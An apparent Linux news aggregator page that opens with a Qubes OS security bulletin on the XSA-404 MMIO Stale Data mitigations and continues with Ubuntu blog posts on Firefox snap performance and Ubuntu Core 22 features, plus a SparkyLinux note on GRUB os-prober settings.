            x86: MMIO Stale Data vulnerabilities (XSA-404)


User action required
---------------------

Users with appropriate hardware (see the "affected hardware" section
below) must install the following specific packages in order to address
the issues discussed in this bulletin:

  For Qubes 4.0, in dom0:
  - Xen packages, version 4.8.5-41

  For Qubes 4.1, in dom0:
  - Xen packages, version 4.14.5-3

These packages will migrate from the security-testing repository to the
current (stable) repository over the next two weeks after being tested
by the community. [1] Once available, the packages are to be installed
via the Qubes Update tool or its command-line equivalents. [2]

Dom0 must be restarted afterward in order for the updates to take
effect.

If you use Anti Evil Maid, you will need to reseal your secret
passphrase to new PCR values, as PCR18+19 will change due to the new
Xen binaries.


Summary
--------

On 2022-06-14, the Xen Project published XSA-404, "x86: MMIO Stale
Data vulnerabilities" [3]:

| This issue is related to the SRBDS, TAA and MDS vulnerabilities.
| Please see:
| 
|   https://xenbits.xen.org/xsa/advisory-320.html (SRBDS)
|   https://xenbits.xen.org/xsa/advisory-305.html (TAA)
|   https://xenbits.xen.org/xsa/advisory-297.html (MDS)
| 
| Please see Intel's whitepaper:
| 
|   https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/processor-mmio-stale-data-vulnerabilities.html


Impact
-------

An adversary who controls a VM with an assigned PCI device can infer
the memory content of other guests or Xen itself. This could allow the
adversary to read information that should be accessible only to Xen or
another VM and to use that information to launch further attacks. In
the default Qubes OS configuration, only sys-net and sys-usb can be
used to perform this attack.


Affected hardware
------------------

All Intel systems are affected. While mitigations are available, they
are available only for some Intel CPU models. Normally, it should be a
simple matter to look up a given CPU model number in a table to see
whether it is affected and whether it is eligible for any mitigations.
Indeed, Intel has published a table [4] that claims to serve this
purpose. Unfortunately, however, we have found several inaccuracies in
this table. Since we cannot rely on the table, we have had to devise an
alternative method using other published Intel technical documents that
appear to be more accurate. This has turned out to be quite complex.

Our best evidence indicates that mitigations are available for all and
only those CPUs that are both eligible for and updated with the Intel
microcode update released in May 2022. [5] Since going through all the
complicated technical steps of checking this manually would be
excessively cumbersome for most users, we have written a tool that does
it for you. Please note that this tool is entirely optional and is *not*
required for any security updates to take effect. Rather, its intended
purpose is to satisfy the curiosity of users who wish to know whether
their own CPUs are eligible for mitigations and who would struggle to
make that determination manually. This tool is included in the
`qubes-core-dom0-linux-4.0.35` package for Qubes 4.0 and the
`qubes-core-dom0-linux-4.1.23` package for Qubes 4.1. These packages
will migrate from the security-testing repository to the current
(stable) repository over the next two weeks after being tested by the
community. [1] Once available, the packages are to be installed via the
Qubes Update tool or its command-line equivalents. [2]

After installing the required updates, you will be able to execute `sudo
cpu-microcode-info` in a dom0 terminal. This will output a table of
information about the logical CPUs (aka CPU "cores") in your system. The
"F-M-S/PI" column lists the "Family-Model-Stepping/Platform ID" codes
that Intel uses in its microcode documentation, [5] which is explained
in further detail in Intel's README. [6] (The manual process of checking
would involve extracting your CPU information, converting it to
hexadecimal, and looking it up in the appropriate table in this
document.) The "Loaded microcode version" column lists the microcode
versions currently loaded for each CPU. The "20220510 update available"
column lists whether the required May 2022 microcode update is
*available* for each CPU. The "20220510 update installed" column lists
whether the required May 2022 microcode update is *installed* in each
CPU.
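For the curious, the manual lookup described above (extract family, model and stepping, convert each to hexadecimal, then find the F-M-S code in Intel's tables) can be sketched as a small pure function. This is only an illustration of the conversion, not the actual cpu-microcode-info tool, and the sample values are one plausible Intel CPU:

```python
def fms_code(cpuinfo_text):
    """Format family/model/stepping from /proc/cpuinfo-style text as the
    hexadecimal F-M-S code used in Intel's microcode release notes."""
    fields = {}
    for line in cpuinfo_text.splitlines():
        if ":" in line:
            key, _, val = line.partition(":")
            # Keep the first occurrence of each field (one logical CPU).
            fields.setdefault(key.strip(), val.strip())
    family = int(fields["cpu family"])
    model = int(fields["model"])
    stepping = int(fields["stepping"])
    return f"{family:02x}-{model:02x}-{stepping:02x}"

sample = "cpu family\t: 6\nmodel\t\t: 142\nstepping\t: 12\n"
print(fms_code(sample))  # 06-8e-0c
```

The platform ID half of "F-M-S/PI" is read from a model-specific register rather than /proc/cpuinfo, so it is omitted from this sketch.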

In order for the updates associated with this bulletin to successfully
mitigate XSA-404, a value of "yes" is required in both of these last two
"20220510 update" columns. If the "available" column has a "yes" while
the "installed" column has a "no," then the May 2022 microcode update
must be installed first. If both columns have "no" values, then this CPU
remains vulnerable, and there is no known mitigation available. If your
system has such a CPU, then installing the Xen packages listed in the
"user action required" section above is *not* expected to mitigate the
problem described in this bulletin. Unfortunately, there is simply
nothing we can do for these CPUs in terms of patching unless we receive
a fix from Intel or receive new information about which CPUs are
affected. Nonetheless, we still recommend installing the updates anyway
(once available), since they will not make the problem any worse,
keeping up-to-date with all security updates is a general best practice,
and future updates will be based on the latest version.

However, hope is not entirely lost for users whose CPUs are not eligible
for software mitigations. Since the vulnerability discussed in this
bulletin does not affect VMs without PCI passthrough devices, users
still have the option of altering their habits to treat VMs like sys-usb
and sys-net as more trusted. While this can be especially challenging in
the case of sys-net, it at least affords users *some* latitude in
working around the problem by being mindful of when such VMs are
running, how trusted their templates are, and similar considerations.


Further plans regarding PCI passthrough
----------------------------------------

This is yet another issue affecting only VMs with access to PCI devices.
This pattern of vulnerabilities has prompted us to research more secure
ways of handling such VMs in future Qubes releases. Eventually, we plan
to treat them as more privileged VMs that require additional protection.
Specific protective measures will be discussed with the community as
part of our ongoing research and development efforts.


Credits
--------

See the original Xen Security Advisory.


References
-----------

[1] https://www.qubes-os.org/doc/testing/
[2] https://www.qubes-os.org/doc/how-to-update/
[3] https://xenbits.xen.org/xsa/advisory-404.html
[4] https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html
[5] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files/blob/main/releasenote.md#microcode-20220510
[6] https://github.com/intel/Intel-Linux-Processor-Microcode-Data-Files#about-processor-signature-family-model-stepping-and-platform-id


--
The Qubes Security Team
https://www.qubes-os.org/security/

17 June, 2022 12:00AM

June 16, 2022


Ubuntu developers

Ubuntu Blog: Operator Day at Kubecon EU 2022 – recordings available!


The Operator Day at Kubecon EU 2022, hosted by Canonical, took place on Monday 16 May 2022. We thank everyone for attending the event. Our thanks go out especially to those who engaged with us via chat during the online event. We enjoyed answering questions and having conversations during the presentations. If you missed Operator Day, we have good news. The recordings are now available:

  • Opening Plenary: Mark Shuttleworth (CEO of Canonical) and David Booth (VP Cloud Native Applications)
  • A common substrate for enabling solutions: Alex Jones (Engineering Director)
  • Juju & Charmed Ecosystem Update: Jon Seager (VP, Enterprise Solutions)
  • 30 mins to stand up a simple app: Daniela Plascencia (Charm Engineering)
  • Observability for developers of Charmed Operators: Simon Aronsson (Charm Engineering)
  • Testing framework for Juju Charmed Operators: Marc Oppenheimer (Charm Engineering)
  • Publishing Charmed Operators and their Ecosystem: Michael Jaeger (Product Manager) and Pedro Leão Da Cruz (Product Lead)
  • Building a sophisticated product on Juju: Rob Gibbon (Product Manager)
  • Experts Panel Discussion on the outlook for Kubernetes and cloud native operations: Mark Shuttleworth (CEO of Canonical), David Booth (VP Cloud Native Applications), Ken Sipe (Co-Chair, Operator Framework, CNCF), Michael Hausenblas (Solution Engineering Lead, AWS), Steve George (Chief Operations Officer, Weaveworks) and Tim Hockin (Principal Software Engineer, Google Cloud)

Operator Day 2021

Curious about previous Operator Day editions? Check out keynotes and announcements from last year:

  • Operator Day at Kubecon NA 2021: Announcement / Watch Keynote
  • Operator Day at Kubecon EU 2021: Announcement / Watch Keynote

Want to learn more about software operators? 

If you missed Operator Day or want to learn more about software operators, join our upcoming webinar. We will cover the advantages of software operators and introduce you to the Juju Charmed Operator Framework, Canonical’s implementation of the software operator pattern. We will also discuss how to go ahead with delivering software operators for metal, cloud and Kubernetes.

Last but not least, check out these links to develop charmed operators:

16 June, 2022 04:55PM

Ubuntu Blog: How are we improving Firefox Snap performance? Part 2

Photo by John Anvik, Unsplash

Welcome to Part 2 of our investigation into Firefox snap performance. To minimise duplication we recommend checking out Part 1 of this series. There you’ll find a summary of our approach, glossary of terms, and tips on standardised benchmarking.

Welcome back, Firefox fans! It’s time for another update on our Firefox snap improvements.

The Firefox snap offers a number of benefits to daily users of Ubuntu as well as a range of other Linux distributions. It improves security, delivers cross-release compatibility and shortens the time for improvements from Mozilla to get into the hands of users.

Currently, this approach has trade-offs when it comes to performance, most notably in Firefox’s first launch after a system reboot. This series tracks our progress in improving startup times to ensure we are delivering the best user experience possible.

Along the way we’ll also be addressing specific use-case issues that have been identified with the help of the community.

Let’s take a look at what we’ve been up to!

Current areas of focus

Here we cover recent fixes, newly identified areas of interest and an update on our profiling investigations.

Jupyter Notebook support – FIXED

Follow the issue

For a number of data scientists, Jupyter Notebook support in the browser is critical to their workflow. When launching a notebook there are two ways to view it:

  • Opening a file at ~/.local/share/jupyter/…
  • Navigating to an http://localhost/ URL

The second route is more compliant with sandboxed environments and has no issues in the Firefox snap. However, the default recommendation is to open the file directly. This caused problems since .local isn’t accessible to confined snaps, which limit access to dot directories by default.

We have merged a snapd workaround giving the browser interface access specifically to ~/.local/share/jupyter to enable the default workflow. We also reported the issue upstream and suggested changing the help text to point to the http://localhost/ URL first as the recommended user journey.

Software rendering

Follow the issue

Last time, we talked about the Firefox snap failing to determine which GPU driver it should use. In this circumstance it falls back to software rendering on devices like the Raspberry Pi, which significantly impacts performance. To address this we’ve updated the snapd OpenGL interface to allow access to more PCI IDs, including the ones used on the Raspberry Pi.

However, this fix doesn’t seem to fully address the issue. There are still reports of acceleration being blocked by the platform. Resolving this has the potential to make a large difference on Raspberry Pi so we are continuing to investigate.

Extension handling

Follow the issue

Copying the large number of language packs during Firefox’s first start remains a consistent issue in all of our benchmarks.

Mozilla intend to mirror a change in the snap that they made on the Windows version of Firefox. This would add the ability to only load one locale at a time based on the system locale.

Native messaging support

Follow the issue

Native messaging support enables key features such as 2FA devices and GNOME extensions. The new XDG Desktop Portal has landed in Jammy but the Firefox integration continues to be iterated on. Things are progressing well and the fix should land soon.

Network Mounts

Follow the issue

The Firefox snap and flatpak are currently unable to interact with network shares. This problem has to do with the XDG Desktop Portal working in local mode. The fact that the fileselector portal is listing those mounts in the sidebar is also adding to the confusion.

Until the portal issue gets resolved, one workaround is to access the mount through /var/run/user/USERUID/gvfs (NOTE: you need gvfs-fuse installed, which creates local mount points).

Font and icon handling

New benchmarks for font and icon handling on amd64 suggest that the cache building of icons, themes and fonts is relatively minor when it comes to resource usage. Firefox spends some time doing this, whereas Chromium does not. For most systems this is around 300ms, but on Raspberry Pi the impact is much larger (up to 6-7 seconds).

Investigations show that the caching process is very I/O intensive, and I/O is a lot slower on an SD card with a Raspberry Pi 4 CPU.

This is likely a symptom of an underlying issue that we’re working to identify.

Futex() syscall time

We analyzed the behavior of the confined snap of Firefox against the unconfined version, as well as the Firefox setup installed from the tarball (available as a direct download from the Mozilla site).

With the confined version, in the strace run summaries, we noticed that the futex() system call takes about 20000us to complete on average on Kubuntu 22.04 and about 7000us on Fedora 36, both installed on identical hardware. These numbers indicate memory locking contention, especially when compared to the same results gathered from the unconfined or non-snap versions of Firefox. There, the futex() system call averages only about 20us.

Furthermore, we noticed that the snap version executes far more futex() system calls (as well as others). Some of this is expected, as the execution of the snap differs from non-snap applications, including the use of base and content snaps, as well as security confinement.

The problem has been reported consistently on different hardware platforms and Linux distributions, with the overall futex() system call average time correlating linearly with the observed startup time.

For instance, a sample strace summary (strace -c) of a Firefox snap run:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- -------------------
 82.18  388.576521       18131     21431      2272 futex
 10.31   48.737839        7583      6427         4 poll
  4.09   19.350524        7660      2526         6 epoll_wait
  1.50    7.114924       72601        98        38 wait4
  0.69    3.258415         574      5676      2715 recvmsg
  0.51    2.406544       41492        58           clock_nanosleep
  0.13    0.633050          71      8843         5 read
  0.12    0.564651          34     16452     11403 openat

And in comparison, the tar version on the same host:

% time     seconds  usecs/call     calls    errors syscall
------ ----------- ----------- --------- --------- -------------------
 46.13    0.397783           8     47957           clock_gettime
 19.76    0.170379          21      7828      1245 futex
  6.90    0.059470           8      6888           gettimeofday
  5.22    0.044991           8      5353      4324 recvmsg
  3.49    0.030111           8      3745           poll
  2.57    0.022125       22125         1           wait4
  1.75    0.015092           8      1829           read
  1.68    0.014518          15       942       319 openat

We have observed similar results with other snaps, including Thunderbird as well as Chromium. While the actual startup time differs from snap to snap, the overall behavior is consistent and underlines an excess of computation with snap binaries.
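The gap between the two summaries above can be quantified by parsing the `strace -c` output directly. Here is a minimal sketch, with the column layout assumed from the tables shown; it is not part of any official tooling:

```python
def parse_strace_summary(text):
    """Map syscall name -> average usecs/call from `strace -c` output."""
    out = {}
    for line in text.splitlines():
        parts = line.split()
        # Data rows start with a numeric "% time" value; the syscall name
        # is the last column and usecs/call is the third.
        if len(parts) >= 5 and parts[0].replace(".", "", 1).isdigit():
            out[parts[-1]] = int(parts[2])
    return out

snap_run = parse_strace_summary(
    " 82.18  388.576521       18131     21431      2272 futex\n"
    " 10.31   48.737839        7583      6427         4 poll\n"
)
tar_run = parse_strace_summary(
    " 19.76    0.170379          21      7828      1245 futex\n"
)
# Average futex() time is close to three orders of magnitude higher
# in the snap run.
print(snap_run["futex"] / tar_run["futex"])
```

Run against full summaries from both setups, a script like this makes the futex() slowdown easy to track across machines and distributions.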

We tried to isolate the source of this phenomenon in different ways. First, we tried to understand whether the security confinement might cause contention in memory management that would lead Firefox (and other binaries) to experience userspace locking issues. This would then translate into the excess of futex() system calls and their very high time per call. Disabling the AppArmor and Seccomp confinement did not yield any improvements.

Likewise, we compiled Firefox with its internal sandboxing disabled, and also built the browser against tcmalloc (to understand whether there may be other reasons for memory contention), but these attempts did not yield any startup time improvements either.

We’re continuing to explore this issue with further strace and memory checks against a non-confined snapd version.

Keep in touch

That’s all for this week’s update! Look out for Part 3 in the next few weeks. In the meantime don’t forget to keep an eye on our key aggregators of issues and feedback:

If you want to take benchmarks and track improvements on your own machine, don’t forget to read our section ‘Create your own benchmarks’ in Part 1 of this series and share them on our Discourse topic.

16 June, 2022 09:59AM

June 15, 2022

hackergotchi for Purism PureOS

Purism PureOS

Upgrading Qubes 4.0.4 to 4.1.0

For those running Qubes 4.0.4 looking to upgrade to 4.1.0, let’s review the upgrade process using a Librem 14. To get started, you’ll need a USB hard drive to store your backup and a USB flash drive to boot the upgrade ISO. Preparing your backup drive Most file system formats will work as long as […]

The post Upgrading Qubes 4.0.4 to 4.1.0 appeared first on Purism.

15 June, 2022 11:47PM by David Hamner

hackergotchi for Ubuntu developers

Ubuntu developers

Bryan Quigley: Dev Ops job?

Dev Ops Job?

Are you looking for a remote (US, Canada, or Phila) Dev Ops job with a company focused on making a positive impact?

15 June, 2022 04:00PM

Ubuntu Blog: Master IoT software updates with validation sets on Ubuntu Core 22

Save your seat for an intro webinar

If you are packaging your IoT applications as snaps or containers, you are aware of the benefits of bundling an application with its dependencies. Publishing snaps across different operating system versions and even distributions is much easier than maintaining package dependencies. Automated IoT software updates make managing fleets of devices more efficient. While you can avoid the dependency hell between software packages, how could you ensure that the diverse applications on an IoT device work well together?

Ubuntu Core 22 introduces the feature of validation sets that makes IoT device management easier. A validation set is a secure policy (assertion) that is signed by your brand and distributed by your dedicated Snap Store. With validation sets you can specify which snaps are required, permitted or forbidden to be installed together on a device. Optionally, specific snap revisions can be set too.

Applying a validation set

An IoT gateway device, for example, will often run various applications that come from different teams or vendors. This software can be released and updated at different intervals.  Moreover, how applications interface with each other can change in ways that are unpredictable. Even loosely coupled applications need to be tested to observe how well they perform together.

With validation sets, you can describe verified combinations of software. It is your decision if you want such a policy to be optional and monitored when needed or enforced by snapd. When enforcing a validation set, snapd will ensure that:

  • Snaps required by a validation set are both present and, if specified, at the correct revision. Attempting to remove a required snap will result in an error and the process will be rejected.
  • Snaps are only refreshed to newer revisions if they continue to satisfy the applied validation sets.
  • Invalid snaps are not allowed to be installed. Attempting to install them will result in an error.

By enforcing validation sets you can ensure that your devices maintain testing and certification integrity over time and across software changes.
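For illustration, a validation set is authored as a JSON document and signed with `snap sign` before being uploaded to your dedicated Snap Store. The sketch below is an assumption-laden example: the account ID, set name, snap names and snap IDs are all placeholders, and the exact headers should be checked against the snapd documentation for your snapd version:

```json
{
  "type": "validation-set",
  "authority-id": "acme-brand",
  "series": "16",
  "account-id": "acme-brand",
  "name": "gateway-apps",
  "sequence": "1",
  "snaps": [
    {
      "name": "sensor-agent",
      "id": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
      "presence": "required",
      "revision": "12"
    },
    {
      "name": "legacy-dashboard",
      "id": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb",
      "presence": "invalid"
    }
  ],
  "timestamp": "2022-06-15T00:00:00Z"
}
```

On a device, `snap validate --monitor acme-brand/gateway-apps` tracks the set without enforcing it, while `snap validate --enforce acme-brand/gateway-apps` makes snapd reject installs, removals and refreshes that would violate it.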

Fine control for your IoT software updates

With effective use of validation sets, you can orchestrate how IoT software updates are performed to your fleet of devices. Even if applications are released and updated at different times, changes to installed software will be kept consistent according to the validation set policy. Application updates in Ubuntu Core are automatic and distributed through the Snap Store. By default, the snapd daemon checks for updates multiple times per day. Each update check is called a refresh. Validation sets provide an elegant alternative to refresh control or using the Snapd REST API to control the conditions under which software updates are performed on a device. Just like updating snaps, rolling out policy updates to your devices can happen automatically through your dedicated Snap Store. This makes managing large scale deployments easier and verifiable.

Learn more

Be sure to read the validation sets and validation-set assertion documentation for more information on how to use this feature with your dedicated Snap Store. This new feature is still under active development. Questions and feedback are always appreciated in the Snapcraft.io forum. If you want to learn more about using snaps, the Snapcraft docs are also a good place to start.

Stay tuned

Watch the Ubuntu Core 22 webinar on June 28th, 2022 at 4:00PM CET.

Curious how your existing project or exciting new idea can benefit from the new features of Ubuntu Core 22? Get in touch with us.


15 June, 2022 02:38PM

Ubuntu Blog: What you’re missing out if you don’t try Ubuntu Core 22

Read the official announcement here

Ubuntu Core is the operating system for IoT and edge

Ubuntu Core, the Ubuntu flavour optimised for IoT and edge devices, has a new version available. With a 2-year release cadence, every new release is both an exciting and challenging milestone.

Ubuntu Core is based on Ubuntu. It is open source, long-term supported (LTS), binary compatible and offers a unified developer experience. It allows developers and makers to build composable and software-defined appliances from immutable snap container images. The goal is to offer developers a new development experience, getting away from complex cross-compilation frameworks and intricate system layers. Application development is the focus, with simple tools that can be used across all Ubuntu flavours.

Ubuntu Core 22 is fully containerised and secure

Its fully containerised architecture offers a new embedded operating system paradigm which is inherently reliable and secure. Applications are completely isolated from each other and the system, creating systems that are extremely robust and fault-tolerant. It has been designed for devices with constrained resources, and optimised for size, reliability, performance and security.

Security is a major concern for unattended and connected devices, so security features have been carefully designed to offer peace of mind to the most paranoid of IT managers. 

  • With full disk encryption, Ubuntu Core ensures data and system integrity, encrypting the partition with keys sealed in the hardware TPM.
  • Secure Boot protects against vulnerabilities at boot time, verifying system integrity with a hardware root of trust.

With four releases behind it, Ubuntu Core is a mature embedded operating system. It has been widely adopted by both enterprises and the community, as it successfully solves many of the key challenges IoT and edge device makers must face. Ubuntu Core 22 builds on those strengths, offering new features that increase its scope of usability.

Watch the Ubuntu Core 22 video

Why you should be excited about UC22

There are many features that should make you feel excited about the new Ubuntu Core 22 release. Discover the most relevant ones in the following sections or check the full list of features:

Migration and backward compatibility

One of the key properties of Ubuntu Core 22 (UC22) is that it maintains the same partition layout as Ubuntu Core 20 (UC20). This is really important, as it provides a path to upgrade UC20 systems to UC22 and backward compatibility of the new features to UC20.

LTS alignment

Ubuntu Core 22 is based on Ubuntu 22.04 LTS; the release has been deliberately aligned with that version (released on 21 April 2022). This allows Ubuntu Core 22 to be fully supported for the whole life of 22.04 LTS (until 2032).

Performance improvements

IoT and embedded devices usually have limited storage, memory and CPU resources. This is  why, with every new release of Ubuntu Core, there are always improvements in all of these areas. In Ubuntu Core 22, both footprint and memory usage have been optimised and reduced. The same is true for boot time and snap execution time.

Remodelling

An Ubuntu Core image is characterised by its model assertion. This model assertion contains identification information (such as brand account id and model name), the essential system snaps (including the gadget snap, kernel snap and the boot base snap), other required or optional snaps that implement the device functionality and additional options for the defined device, such as the security grade and encryption of the image.

Remodelling is a new feature that allows changing any of the elements of the model assertion. Brand, model, IoT App Store ID or version are some of the contexts that can be changed, enabling resellers to rebrand devices. This is also a necessary feature for having a migration path between UC20 and UC22.
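For context, the model assertion that remodelling rewrites is authored as a JSON document and signed by the brand. The sketch below is a hypothetical minimal example: brand, model name and snap IDs are placeholders, and the full set of headers should be checked against the Ubuntu Core documentation:

```json
{
  "type": "model",
  "series": "16",
  "authority-id": "acme-brand",
  "brand-id": "acme-brand",
  "model": "acme-gateway-uc22",
  "base": "core22",
  "grade": "signed",
  "snaps": [
    { "name": "pc", "type": "gadget", "default-channel": "22/stable", "id": "cccccccccccccccccccccccccccccccc" },
    { "name": "pc-kernel", "type": "kernel", "default-channel": "22/stable", "id": "dddddddddddddddddddddddddddddddd" }
  ],
  "timestamp": "2022-06-15T00:00:00Z"
}
```

A remodel then amounts to signing a new revision of this document and applying it on the device with `snap remodel <new-model-assertion-file>`.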

Validation-sets

A validation set is an assertion that lists specific snaps that are either required to be installed together or are permitted to be installed together on a device or system. It allows applications to be updated consistently and simultaneously towards well defined and predictable revisions. This increases the compatibility and consistency between applications.

Factory reset

With the factory reset feature, you can restore an Ubuntu Core device to a known pristine state, preserving essential data created during initialisation. Although it was possible to perform this action with previous Ubuntu Core versions, it was a tedious and manual task. Ubuntu Core 22 includes a factory reset boot mode, accessible from run and recovery modes.

Quota groups

A quota group sets resource limits on services inside the snaps it contains. Currently, maximum memory and CPU usage are supported as resource limits.
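On a device, quota groups are managed with the `snap set-quota` family of commands. The session below is an illustrative sketch: the group and snap names are hypothetical, and the available flags (memory quotas arrived before CPU quotas) depend on the snapd version on the device:

```shell
# Create a quota group capping two service snaps (hypothetical names)
# at 512 MB of RAM and half a CPU
snap set-quota media-services --memory=512MB --cpu=50% mediaserver transcoder

# List existing groups and their limits
snap quotas

# Dissolve the group without removing the snaps
snap remove-quota media-services
```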

MAAS support

MAAS is Metal As A Service, a service that treats physical machines like virtual machine instances in the cloud. It provisions a full system image remotely onto bare-metal hardware. It is now possible to deploy Ubuntu Core 22 to bare-metal devices in the field using MAAS.

Ubuntu Core 22 Webinar invitation

Introduction to Ubuntu Core 22

Save your seat for our first episode of our webinar series: Introduction to Ubuntu Core 22 on June 28th, 2022 at 4:00PM CET.

In this webinar, you will learn:

  • Everything you need to know about Ubuntu Core
  • What are the new and exciting features of Ubuntu Core 22
  • Why Ubuntu Core 22 is the embedded operating system chosen by many key players

Get started with UC22

Getting started with Ubuntu Core 22 is very easy and straightforward. If you use pre-certified hardware then you just need to:

  1. Select the hardware you want
  2. Select the right Ubuntu Core 22 image
  3. Flash the image
  4. Boot and configure

Ubuntu Core has pre-built images for many popular platforms. Explore our list of supported platforms or contact us. You can also start a project from scratch for your custom board following our simple guides.

Stay tuned

Canonical at Embedded World

Join us at Embedded World to see exciting demos (June 21-23rd, 2022, in Nuremberg, Germany).

Further reading

15 June, 2022 02:01PM

Ubuntu Blog: Canonical Ubuntu Core 22 is now available – optimised for IoT and embedded devices

The ultra-secure embedded Ubuntu introduces support for real-time compute in robotics and industrial applications.

15 June 2022: Canonical today announced that Ubuntu Core 22, the fully containerised Ubuntu 22.04 LTS variant optimised for IoT and edge devices, is now generally available for download from ubuntu.com/download/iot. Combined with Canonical’s technology offer, this release brings Ubuntu’s comprehensive and industry-leading operating system (OS) and services to a complete range of embedded and IoT devices.

IoT manufacturers face complex challenges to deploy devices on time and within budget. Ensuring security and remote management at scale is also taxing as device fleets expand. Ubuntu Core 22 helps manufacturers meet these challenges with an ultra-secure, resilient, and low-touch OS, backed by a growing ecosystem of silicon and ODM partners.

“Our goal at Canonical is to provide secure, reliable open source everywhere – from the development environment to the cloud, down to the edge and to devices,” said Mark Shuttleworth, CEO of Canonical. “With this release, and Ubuntu’s real-time kernel, we are ready to expand the benefits of Ubuntu Core across the entire embedded world.”

Real-time compute support

The Ubuntu 22.04 LTS real-time kernel, now available in beta, delivers high performance, ultra-low latency and workload predictability for time-sensitive industrial, telco, automotive and robotics use cases. 

The new release includes a fully preemptible kernel to ensure time-bound responses. Canonical  partners with silicon and hardware manufacturers to enable advanced real-time features out of the box on Ubuntu Certified Hardware. 

Application-centric

Ubuntu Core provides a robust, fully containerised Ubuntu, which breaks down the monolithic Ubuntu image into packages known as snaps – including the kernel, OS and applications. Each snap has an isolated sandbox that includes the application’s dependencies, to make it fully portable and reliable. Canonical’s Snapcraft framework enables on-rails snap development for rapid iteration, automated testing and reliable deployment.

Every device running Ubuntu Core has a dedicated IoT App Store, which offers full control over the apps on their device, and can create, publish and distribute software on one platform. The IoT App Store offers enterprises a sophisticated software management solution, enabling a range of new on-premise features.

The system guarantees transactional mission-critical over-the-air (OTA) updates of the kernel, OS and applications – updates will always complete successfully, or roll back automatically to the previous working version, so a device cannot be “bricked” by an incomplete update. Snaps also provide delta updates to minimise network traffic, and digital signatures to ensure software integrity and provenance.

Secure and low touch

Ubuntu Core also provides advanced security features out of the box, including secure boot, full disk encryption, secure recovery and strict confinement of the OS and applications. 

“KMC Controls’ range of IoT devices are purpose-built for mission-critical industrial environments. Security is paramount for our customers. We chose Ubuntu Core for its built-in advanced security features and robust over-the-air update framework. Ubuntu Core comes with 10 years of security update commitment which allows us to keep devices secure in the field for their long life.  With a proven application enablement framework, our development teams can focus on creating applications that solve business problems”, said Brad Kehler, COO at KMC Controls.

Customers benefit from Canonical’s 10 years security maintenance of kernel, OS and application-level code, enabling devices and their applications to meet enterprise and public sector requirements for digital safety.

Thriving partner ecosystem

Partnerships with leading silicon and hardware partners, including Advantech, Lenovo and many others, have established Ubuntu Core’s presence in the market.

The Ubuntu Certified Hardware program defines a range of off-the-shelf IoT and edge devices trusted to work with Ubuntu. The program uniquely includes a commitment to continuous testing of certified hardware at Canonical’s labs with every security update over the full lifecycle of the device.

“Advantech provides embedded, industrial, IoT and automation solutions. We continue to strengthen our participation in the Ubuntu Certified Hardware Program. Canonical ensures that certified hardware goes through an extensive testing process and provides a stable, secure, and optimised Ubuntu Core to reduce time to market and development costs for our customers.” said Eric Kao, Director of Advantech WISE-Edge+.

Learn more about Ubuntu Core 22

More information on Ubuntu Core 22 can be found at ubuntu.com/core. Canonical will also be publishing a series of blog posts providing deeper dives into the features of Core 22. 

To start working with Ubuntu Core 22 now, download the images for some of the most popular platforms or browse all the supported images.

About Canonical

Canonical is the publisher of Ubuntu, the OS for most public cloud workloads as well as the emerging categories of smart gateways, self-driving cars and advanced robots. Canonical provides enterprise security, support and services to commercial users of Ubuntu. Established in 2004, Canonical is a privately held company.

Media Contacts

Daniel Griffiths,
Director of Communications
pr@canonical.com

Aldo Martinez,
Marketing Executive
pr@canonical.com

15 June, 2022 12:03PM

hackergotchi for SparkyLinux

SparkyLinux

GRUB 2.06

Today’s update on Sparky testing (7) of GRUB bootloader provides a notable change – it does not list other operating systems on the GRUB menu any more:

grub2 (2.06-1) unstable; urgency=medium
* Boot menu entries for other operating systems are no longer generated by
default. To re-enable this, set GRUB_DISABLE_OS_PROBER=false in
/etc/default/grub.

If you have other operating systems installed on your machine edit the grub config file:
sudo nano /etc/default/grub

and add this line at the end of the file:
GRUB_DISABLE_OS_PROBER=false

then regenerate the GRUB menu list:
sudo update-grub
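The steps above can also be scripted. The sketch below rehearses the edit against a scratch copy of the config file so it is safe to try anywhere; on a real system you would point `cfg` at /etc/default/grub, run as root, and finish with `update-grub`:

```shell
# Rehearse the config change on a scratch copy of /etc/default/grub
cfg=$(mktemp)
printf 'GRUB_DEFAULT=0\nGRUB_TIMEOUT=5\n' > "$cfg"   # stand-in for the existing file

# Append the setting only if it is not already present
grep -q '^GRUB_DISABLE_OS_PROBER=' "$cfg" || \
    echo 'GRUB_DISABLE_OS_PROBER=false' >> "$cfg"

grep '^GRUB_DISABLE_OS_PROBER' "$cfg"
```

The final grep confirms the setting landed exactly once, so re-running the script does not duplicate the line.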

 

15 June, 2022 11:01AM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Oli Warner: Goodbye Internet Explorer

But what will people download Chrome with now?

Raise a glass, kiss your wife, hug your children. It’s finally gone.

IE11 Logo

It’s dead.

Internet Explorer has been dying for an age. 15 years ago IE6 finally bit it, 8 years ago I was calling for webdevs to hasten the death of IE8 and today is the day that Microsoft has finally pulled regular support for “retired” Internet Explorer 11, last of its name.

Its successor, Edge, uses Chrome’s renderer. While I’m sure we’ll have a long chat about the problems of monocultures one day, this means —for now— we can really focus on modern standards without having to worry about what this 9 year old renderer thinks. And I mean that at a commercial, enterprise level. Use display: grid without fallback code. Use ES6 features without Babel transpiling everything. Go, create something and expect it to just work.

Here’s to never having to download the multi-gigabyte, 90-day Internet Explorer test machine images. Here’s to kicking out swathes of compat code. Here’s to being able to [fairly] rigorously test a website locally without a third party running a dozen versions of Windows.

The web is more free for this. Rejoice! while it lasts.

15 June, 2022 12:00AM

June 14, 2022

Ubuntu Blog: Composable infrastructure, sustainable computing and more: OIS 2022 highlights

OIS 2022 is over, but the OpenInfra community stays tuned for the next OpenInfra Summit, taking place in Vancouver in 2023! This year’s summit in Berlin offered a lot of insightful keynotes and technical sessions. Speakers discussed the most recent trends in the industry, including composable infrastructure and sustainable computing, and set the pace for the next releases of the OpenInfra-hosted project, including OpenStack. It was a great opportunity to reconnect in person after the pandemic.

If you missed the event, read on to get a summary of the most notable highlights from OIS 2022, Berlin.

OpenStack enters the Slope of Enlightenment

